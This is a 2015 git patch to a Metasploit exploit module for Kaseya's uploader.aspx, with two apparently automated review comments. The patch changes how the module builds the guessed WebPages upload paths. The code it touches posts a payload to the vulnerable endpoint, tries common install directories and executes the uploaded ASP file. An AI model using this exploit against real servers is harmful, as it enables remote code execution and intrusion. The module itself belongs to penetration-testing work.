From a88a6c55804d00b3cfea9364bf26f92b3bff6bd4 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 1 Oct 2015 13:22:56 -0500
Subject: [PATCH] Add WebPges to the paths
---
 .../exploits/windows/http/kaseya_uploader.rb | 24 +++++++++----------
 1 file changed, 12 insertions(+), 12 deletions(-)
diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb
index a3c0b7f4cc..8f03ed2b1a 100644
--- a/modules/exploits/windows/http/kaseya_uploader.rb
+++ b/modules/exploits/windows/http/kaseya_uploader.rb
@@ -60,13 +60,13 @@ class Metasploit3 < Msf::Exploit::Remote
 def upload_file(payload, path, filename, session_id)
- print_status("#{peer} - Uploading payload to #{path + 'WebPages\\'}...")
+ print_status("#{peer} - Uploading payload to #{path}...")
 res = send_request_cgi({
 'method' => 'POST',
 'uri' => normalize_uri('ConfigTab', 'uploader.aspx'),
 'vars_get' => {
- 'PathData' => path + 'WebPages' + '\\',
+ 'PathData' => path,
 'qqfile' => filename
 },
 'data' => payload,
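Review bot: `upload_file` now sends `path` unchanged as `PathData`, so it depends on every caller passing the complete destination directory with its trailing backslash, and nothing in the hunk states that. The caller in the second hunk relies on the same assumption when it builds `path + asp_name` for `register_files_for_cleanup`, so a path without the separator would at least register the wrong file name for cleanup. I would document the contract directly above the method, for example `# path: full destination directory, must end with a backslash`. The body of `upload_file` continues past the end of the hunk.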
@@ -100,20 +100,20 @@ class Metasploit3 < Msf::Exploit::Remote
 paths = [
 # We have to guess the path, so just try the most common directories
- 'C:\\Kaseya\\',
- 'C:\\Program Files\\Kaseya\\',
- 'C:\\Program Files (x86)\\Kaseya\\',
- 'D:\\Kaseya\\',
- 'D:\\Program Files\\Kaseya\\',
- 'D:\\Program Files (x86)\\Kaseya\\',
- 'E:\\Kaseya\\',
- 'E:\\Program Files\\Kaseya\\',
- 'E:\\Program Files (x86)\\Kaseya\\',
+ 'C:\\Kaseya\\WebPages\\',
+ 'C:\\Program Files\\Kaseya\\WebPages\\',
+ 'C:\\Program Files (x86)\\Kaseya\\WebPages\\',
+ 'D:\\Kaseya\\WebPages\\',
+ 'D:\\Program Files\\Kaseya\\WebPages\\',
+ 'D:\\Program Files (x86)\\Kaseya\\WebPages\\',
+ 'E:\\Kaseya\\WebPages\\',
+ 'E:\\Program Files\\Kaseya\\WebPages\\',
+ 'E:\\Program Files (x86)\\Kaseya\\WebPages\\',
 ]
 paths.each do |path|
 if upload_file(payload, path, asp_name, session_id)
- register_files_for_cleanup(path + "WebPages\\" + asp_name)
+ register_files_for_cleanup(path + asp_name)
 print_status("#{peer} - Executing payload #{asp_name}")
 send_request_cgi({
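Review bot: The comment at the top of the list, `# We have to guess the path, so just try the most common directories`, is stale after this change. The entries are no longer install roots but the `WebPages` directory under each of them, and they are passed verbatim to `upload_file` and to `register_files_for_cleanup(path + asp_name)`. I would reword it to `# We have to guess the install location; each entry is the WebPages directory, with a trailing backslash`. The `paths.each` block continues past the end of the hunk.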